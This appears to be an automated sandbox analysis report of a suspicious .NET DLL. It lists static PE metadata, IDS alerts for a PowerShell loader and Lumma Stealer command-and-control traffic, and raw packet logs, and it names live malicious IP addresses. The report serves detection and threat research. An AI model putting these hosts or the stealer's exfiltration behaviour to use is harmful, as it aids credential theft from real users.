                                                          SHA512:77ee3b8c15aca98992d2e58737c3015bfc9e30141b04dbaa8c750cf839f2ac4a5e645c04e8de030b08210bd8b16aea4e71b6bc43f0e36256b566740997639371
                                                          SSDEEP:192:wXIy/D9DaozFCNY7+VS9aK08SWc4oVhfJY3XuR7g/vXWtV:wvtaoBCNdSl08S9dfIXq7kXWtV
                                                          TLSH:D712962677E8013FF5B34FB26F9161912D79F7F99B17952E48A403498BC2A00CEA1735
                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....hg...........!.................7... ...@....... ....................................@..........................@..(..

                                                          File Icon

                                                          Icon Hash:7ae282899bbab082

                                                          Static PE Info

                                                          General

                                                          Entrypoint:0x1000371e
                                                          Entrypoint Section:.text
                                                          Digitally signed:false
                                                          Imagebase:0x10000000
                                                          Subsystem:windows cui
                                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL
                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                          Time Stamp:0x67682E9F [Sun Dec 22 15:22:07 2024 UTC]
                                                          TLS Callbacks:
                                                          CLR (.Net) Version:
                                                          OS Version Major:4
                                                          OS Version Minor:0
                                                          File Version Major:4
                                                          File Version Minor:0
                                                          Subsystem Version Major:4
                                                          Subsystem Version Minor:0
                                                          Import Hash:dae02f32a21e03ce65412f6e56942daa

                                                          Entrypoint Preview

                                                          Instruction
                                                          jmp dword ptr [10002000h]
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al

                                                          Data Directories

                                                          NameVirtual AddressVirtual Size Is in Section
                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x40040x28.sdata
                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x36cc0x4f.text
                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x60000x3d8.rsrc
                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x80000xc.reloc
                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                          Sections

                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                          .text0x20000x17240x180069cf51443db6d6a24459dae5b0375da6False0.4713541666666667data4.965129802097543IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                          .sdata0x40000x560x20067a7280dca266d2af5d3760c79ec2f21False0.154296875data0.9104602226152042IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                          .rsrc0x60000x3d80x4002f32111f189e61eb9fa7b824f9d87d8aFalse0.3916015625data3.160547167726883IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                          .reloc0x80000xc0x200b33ede57f2ddffc55b3cdc7d80887250False0.048828125data0.12227588125913882IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                          Resources

                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                          RT_VERSION0x60580x380data0.41517857142857145

                                                          Imports

                                                          DLLImport
                                                          mscoree.dll_CorDllMain

                                                          Exports

                                                          NameOrdinalAddress
                                                          DllRegisterServer10x100036be

                                                          Network Behavior

                                                          Suricata IDS Alerts

                                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                          2024-12-24T02:18:15.825605+01002859377ETPRO MALWARE Generic Powershell Loader Requesting Additional Payloads (GET)1192.168.2.849706147.45.44.13180TCP
                                                          2024-12-24T02:18:15.882650+01002859377ETPRO MALWARE Generic Powershell Loader Requesting Additional Payloads (GET)1192.168.2.849707147.45.44.13180TCP
                                                          2024-12-24T02:18:16.547808+01002859377ETPRO MALWARE Generic Powershell Loader Requesting Additional Payloads (GET)1192.168.2.849706147.45.44.13180TCP
                                                          2024-12-24T02:18:16.621990+01002859377ETPRO MALWARE Generic Powershell Loader Requesting Additional Payloads (GET)1192.168.2.849707147.45.44.13180TCP
                                                          2024-12-24T02:18:17.508551+01002859377ETPRO MALWARE Generic Powershell Loader Requesting Additional Payloads (GET)1192.168.2.849708147.45.44.13180TCP
                                                          2024-12-24T02:18:18.493265+01002859377ETPRO MALWARE Generic Powershell Loader Requesting Additional Payloads (GET)1192.168.2.849708147.45.44.13180TCP
                                                          2024-12-24T02:18:20.445540+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849709172.67.195.241443TCP
                                                          2024-12-24T02:18:20.446008+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849710172.67.195.241443TCP
                                                          2024-12-24T02:18:21.489323+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849712172.67.195.241443TCP
                                                          2024-12-24T02:18:21.702761+01002859377ETPRO MALWARE Generic Powershell Loader Requesting Additional Payloads (GET)1192.168.2.849711147.45.44.13180TCP
                                                          2024-12-24T02:18:21.915329+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.849709172.67.195.241443TCP
                                                          2024-12-24T02:18:21.915329+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.849709172.67.195.241443TCP
                                                          2024-12-24T02:18:21.936896+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.849710172.67.195.241443TCP
                                                          2024-12-24T02:18:21.936896+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.849710172.67.195.241443TCP
                                                          2024-12-24T02:18:22.256469+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.849712172.67.195.241443TCP
                                                          2024-12-24T02:18:22.256469+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.849712172.67.195.241443TCP
                                                          2024-12-24T02:18:22.428578+01002859377ETPRO MALWARE Generic Powershell Loader Requesting Additional Payloads (GET)1192.168.2.849711147.45.44.13180TCP
                                                          2024-12-24T02:18:22.831849+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849714172.67.195.241443TCP
                                                          2024-12-24T02:18:23.131739+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849715172.67.195.241443TCP
                                                          2024-12-24T02:18:23.478840+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849716172.67.195.241443TCP
                                                          2024-12-24T02:18:24.238070+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.849716172.67.195.241443TCP
                                                          2024-12-24T02:18:24.238070+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.849716172.67.195.241443TCP
                                                          2024-12-24T02:18:25.786583+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849717172.67.195.241443TCP
                                                          2024-12-24T02:18:26.049767+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849718172.67.195.241443TCP
                                                          2024-12-24T02:18:26.799396+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.849718172.67.195.241443TCP
                                                          2024-12-24T02:18:26.799396+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.849718172.67.195.241443TCP
                                                          2024-12-24T02:18:26.991906+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.849717172.67.195.241443TCP
                                                          2024-12-24T02:18:28.029002+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849719172.67.195.241443TCP
                                                          2024-12-24T02:18:28.253360+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849720172.67.195.241443TCP
                                                          2024-12-24T02:18:28.794733+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.849719172.67.195.241443TCP
                                                          2024-12-24T02:18:28.794733+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.849719172.67.195.241443TCP
                                                          2024-12-24T02:18:30.647319+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849721172.67.195.241443TCP
                                                          2024-12-24T02:18:33.014934+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849723172.67.195.241443TCP
                                                          2024-12-24T02:18:33.016177+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849722172.67.195.241443TCP
                                                          2024-12-24T02:18:35.342680+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849724172.67.195.241443TCP
                                                          2024-12-24T02:18:35.354173+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849725172.67.195.241443TCP
                                                          2024-12-24T02:18:37.455265+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849726172.67.195.241443TCP
                                                          2024-12-24T02:18:38.944428+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849727172.67.195.241443TCP
                                                          2024-12-24T02:18:39.723586+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.849727172.67.195.241443TCP
                                                          2024-12-24T02:18:39.726092+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849728172.67.195.241443TCP
                                                          2024-12-24T02:18:42.029577+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849729172.67.195.241443TCP
                                                          2024-12-24T02:18:44.807871+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849730172.67.195.241443TCP

                                                          Network Port Distribution

                                                          TCP Packets

                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Dec 24, 2024 02:18:13.629841089 CET4970680192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:13.749393940 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:13.749982119 CET4970680192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:13.778759003 CET4970680192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:13.898435116 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:14.009279966 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:14.128751040 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:14.128850937 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:14.135981083 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:14.255569935 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:15.053478956 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:15.053525925 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:15.053596973 CET4970680192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:15.389766932 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:15.389960051 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:15.390017986 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:15.424038887 CET4970680192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:15.481246948 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:15.543765068 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:15.600728035 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:15.669096947 CET4970880192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:15.788860083 CET8049708147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:15.788950920 CET4970880192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:15.789781094 CET4970880192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:15.825175047 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:15.825540066 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:15.825561047 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:15.825604916 CET4970680192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:15.826459885 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:15.826472998 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:15.826508999 CET4970680192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:15.827389956 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:15.827436924 CET4970680192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:15.827444077 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:15.828186035 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:15.828227997 CET4970680192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:15.834485054 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:15.836971045 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:15.837013960 CET4970680192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:15.837246895 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:15.845201015 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:15.845246077 CET4970680192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:15.882447958 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:15.882595062 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:15.882607937 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:15.882649899 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:15.883373022 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:15.883385897 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:15.883434057 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:15.884020090 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:15.884032011 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:15.884059906 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:15.884943962 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:15.884958029 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:15.884993076 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:15.890808105 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:15.890856028 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:15.891010046 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:15.899420977 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:15.899471998 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:15.909323931 CET8049708147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:15.945328951 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:15.945616007 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:15.945666075 CET4970680192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:15.949515104 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.002257109 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.002580881 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.002655029 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.006350040 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.017349958 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.017393112 CET4970680192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.017659903 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.021296024 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.021338940 CET4970680192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.021411896 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.027523041 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.027560949 CET4970680192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.027841091 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.035814047 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.035859108 CET4970680192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.035942078 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.047064066 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.047116041 CET4970680192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.047136068 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.052092075 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.052151918 CET4970680192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.052383900 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.060188055 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.060244083 CET4970680192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.060462952 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.068377972 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.068428993 CET4970680192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.068686008 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.074564934 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.074621916 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.074698925 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.076468945 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.076512098 CET4970680192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.076715946 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.078562021 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.078604937 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.078699112 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.086162090 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.086174965 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.086298943 CET4970680192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.086622953 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.086669922 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.086755991 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.091708899 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.091758013 CET4970680192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.091831923 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.094413042 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.094460964 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.094696999 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.102475882 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.102526903 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.102761984 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.106185913 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.106240034 CET4970680192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.106302977 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.110502958 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.110554934 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.110769033 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.118351936 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.118401051 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.118640900 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.126358032 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.126426935 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.126490116 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.134342909 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.134396076 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.134648085 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.142210960 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.142261028 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.142621040 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.146622896 CET4970680192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.149434090 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.149471045 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.149482012 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.163611889 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.163676023 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.163763046 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.220746994 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.266443968 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.340276957 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.547559977 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.547753096 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.547807932 CET4970680192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.549802065 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.550019026 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.550334930 CET4970680192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.554466963 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.554682970 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.554738998 CET4970680192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.559164047 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.559360981 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.559417009 CET4970680192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.563796043 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.564039946 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.564085960 CET4970680192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.568485022 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.568677902 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.568727016 CET4970680192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.573087931 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.573297977 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.573353052 CET4970680192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.577758074 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.578131914 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.578183889 CET4970680192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.582412958 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.582606077 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.582657099 CET4970680192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.587156057 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.587367058 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.589536905 CET4970680192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.591748953 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.591957092 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.593532085 CET4970680192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.596390009 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.596577883 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.597536087 CET4970680192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.601031065 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.601248980 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.601385117 CET4970680192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.605711937 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.605910063 CET8049706147.45.44.131192.168.2.8
